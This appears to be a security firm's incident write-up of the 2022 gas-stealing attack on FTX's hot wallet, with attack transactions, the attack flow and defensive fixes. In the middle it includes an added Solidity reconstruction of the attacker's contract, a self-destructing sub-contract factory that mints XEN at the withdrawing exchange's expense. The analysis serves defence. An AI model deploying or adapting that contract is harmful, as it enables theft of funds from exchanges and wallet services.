On October 13, 2022, according to Beosin's EagleEye Web3 security monitoring platform, the FTX exchange was hit by a gas-stealing attack: its hot wallet was manipulated into paying the gas fees for minting a large amount of XEN tokens on the attacker's behalf.
In response to this attack, Coinlive invited Beosin, a Singapore-based Web3 security firm, to analyze the specific process of the exploit.
1. Event-related information
A few of the attack transactions:
0xc96b84cd834655290aa4bae7de80a3c117cc19d414f5bcf2fb85b8c554430089
0x8eb73bd5c08318a4cfd233940c3a58744830cda999e59ecbc56f094618a91d69
0x6bada8e084f8d3b62311f0b6eda10f2690e7542dab75a0de436a640036bccf94
One of the attacker's addresses: 0x1d371CF00038421d6e57CFc31EEff7A09d4B8760
One of the attacked contracts: 0xCba9b1Fd69626932c704DAc4CB58c29244A47FD3
The attacked FTX hot wallet address: 0xC098B2a3Aa256D2140208C3de6543aAEf5A94444
2. Attack flow
We will focus on one specific attack transaction as an example: (0x8eb73bd5c08318a4cfd233940c3a58744830cda999e59ecbc56f094618a91d69)
In the first step, the attacker deployed a malicious contract on the chain (0xCba9b1Fd69626932c704DAc4CB58c29244A47FD3).
In the second step, the attacker had a small amount of ETH withdrawn from FTX to the malicious contract address (0xCba9...7FD3), so the transfer was sent by FTX's hot wallet (0xC098...4444). The incoming transfer ran the malicious contract, which used that call to create sub-contracts in batches.
Because many sub-contracts are created over the course of the whole attack, and each one self-destructs as soon as it has executed, the figure below shows only one of them as an example.
In the third step, the sub-contract's fallback() function initiates a mint request to the $XEN contract by calling claimRank(term), where term is the minting period in days (>= 1). The call costs nothing beyond the gas needed to execute it.
claimMintRewardAndShare() is the claim function. It only checks that the term has elapsed (1 day, as set by the attacker) and then pays the minted $XEN to any address given. Because the transaction initiator throughout this call chain is the FTX hot wallet address, the gas for the entire chain is paid by the FTX hot wallet, while the $XEN is minted to the attacker's address.
The three steps are repeated in a cycle: each new withdrawal claims the matured tokens and submits a fresh minting request in the same transaction.
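The cycle above, written out as an added illustrative reconstruction in Solidity. This is not the attacker's deployed code and was not recovered from the chain: the contract names, the POOL and RESERVE bounds, and the use of CREATE2 to redeploy each self-destructed sub-contract at the same address (so that the next round can claim the mint its predecessor started) are assumptions made for the example. The two XEN entry points, claimRank and claimMintRewardAndShare, are the ones the analysis names.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustrative reconstruction of the three-step cycle. Not the attacker's
// code: contract names, POOL, RESERVE and the CREATE2 address reuse are assumed.
interface IXEN {
    function claimRank(uint256 term) external;                             // term in days, >= 1
    function claimMintRewardAndShare(address other, uint256 pct) external; // pct of the reward goes to `other`
}

// Step 1: the contract the attacker deploys and then names as withdrawal recipient.
contract GasSink {
    IXEN public immutable xen;
    address public immutable beneficiary;      // attacker EOA that ends up holding the XEN
    uint256 public immutable term;             // 1 day in the incident
    uint256 public constant POOL = 32;         // number of sub-contract slots (assumed)
    uint256 public constant RESERVE = 400_000; // gas kept back so the withdrawal itself still succeeds (assumed)

    mapping(uint256 => uint256) public maturityOf; // slot => timestamp its pending mint matures (0 = none)
    bool public harvestFirst; // read by the sub-contract, so its init code never changes

    constructor(IXEN _xen, address _beneficiary, uint256 _term) {
        xen = _xen;
        beneficiary = _beneficiary;
        term = _term;
    }

    // Step 2: the exchange's ETH transfer arrives here with empty calldata. The hot
    // wallet is tx.origin, so it pays for every CREATE2 and XEN call below, bounded
    // only by the gas limit the exchange put on its own transaction.
    fallback() external payable {
        for (uint256 slot = 0; slot < POOL && gasleft() > RESERVE; slot++) {
            uint256 due = maturityOf[slot];
            if (due != 0 && block.timestamp <= due) continue; // still maturing, leave it alone
            harvestFirst = (due != 0);
            // Same salt and identical init code give the same address every round, so the
            // redeployed sub-contract owns the XEN mint that its predecessor started.
            Sub sub = new Sub{salt: bytes32(slot)}();
            (bool ok, ) = address(sub).call(""); // Step 3: runs the sub-contract's fallback
            require(ok, "xen call failed");
            maturityOf[slot] = block.timestamp + term * 1 days;
        }
    }
}

// The throw-away sub-contract. It is created, makes its XEN calls and self-destructs
// inside one transaction, which still removes its code after EIP-6780.
contract Sub {
    fallback() external {
        GasSink parent = GasSink(payable(msg.sender));
        IXEN xen = parent.xen();
        address beneficiary = parent.beneficiary();
        if (parent.harvestFirst()) {
            // Matured mint from the previous round: 100% of the XEN goes to the attacker.
            xen.claimMintRewardAndShare(beneficiary, 100);
        }
        xen.claimRank(parent.term()); // start the next mint; costs gas only
        selfdestruct(payable(beneficiary));
    }
}
```

The point to notice is that nothing in GasSink spends the attacker's own gas: every round of claimRank and claimMintRewardAndShare executes inside the exchange's withdrawal transaction, and the loop keeps going until the gas limit the exchange chose for that transaction is nearly used up. A higher gas limit on the withdrawal simply mints more XEN for the attacker.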
3. Vulnerability Analysis
This attack exploits the fact that FTX imposed no restrictions on withdrawals to contract addresses and no cap on the gas limit of its ETH withdrawal transactions. Together these let the attacker mint $XEN tokens for profit at FTX's expense.
At the time of publication, FTX had lost a total of 81 ETH, and the attacker swapped the minted $XEN for ETH on decentralized exchanges such as DODO and Uniswap.
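The two missing controls, shown side by side as an added example (not FTX's code; contract and function names are assumed). The weak form is a payout routine that forwards all remaining gas to whatever address it is paying; the hardened form refuses contract recipients on the plain ETH path and gives the recipient only the 2300-gas stipend, which is far below the 32000 gas a contract creation costs, so a factory like the one described above cannot run.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example (not FTX's code): the same payout routine with and without the two
// controls the analysis says were missing. Contract and function names are assumed.

// Weak form: to.call forwards all remaining gas, so a contract recipient can do an
// arbitrary amount of work (CREATE2 loops, token mints) at the sender's expense.
contract UncheckedPayout {
    address public immutable operator;

    constructor() { operator = msg.sender; }
    receive() external payable {}

    function withdraw(address to, uint256 amount) external {
        require(msg.sender == operator, "not operator");
        (bool ok, ) = to.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Hardened form: plain ETH withdrawals go to externally owned accounts only, and the
// recipient gets just the 2300-gas stipend of transfer(), not the caller's gas budget.
contract CheckedPayout {
    address public immutable operator;

    event Withdrawal(address indexed to, uint256 amount);

    constructor() { operator = msg.sender; }
    receive() external payable {}

    function withdraw(address to, uint256 amount) external {
        require(msg.sender == operator, "not operator");
        // Contract recipients are rejected here and routed to manual review instead
        // of being paid blindly.
        require(to.code.length == 0, "contract recipient requires review");
        // 2300 gas stipend only; reverts on failure. Not enough for a CREATE (32000 gas).
        payable(to).transfer(amount);
        emit Withdrawal(to, amount);
    }
}
```

The off-chain counterpart, for an exchange whose hot wallet is an ordinary externally owned account, is to set the gas limit of a plain ETH withdrawal to 21000, the exact cost of an EOA-to-EOA value transfer, rather than taking whatever eth_estimateGas returns; with a 21000 limit a contract recipient's code runs out of gas and the transaction fails instead of minting for the attacker. Two caveats: to.code.length == 0 also turns away legitimate smart-contract wallets, which is why the hardened form routes them to review rather than silently dropping them, and a contract that is still being constructed has an empty code field, so this check alone is not proof that the recipient is an EOA.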
Beosin’s Fund Movement and Tracing Chart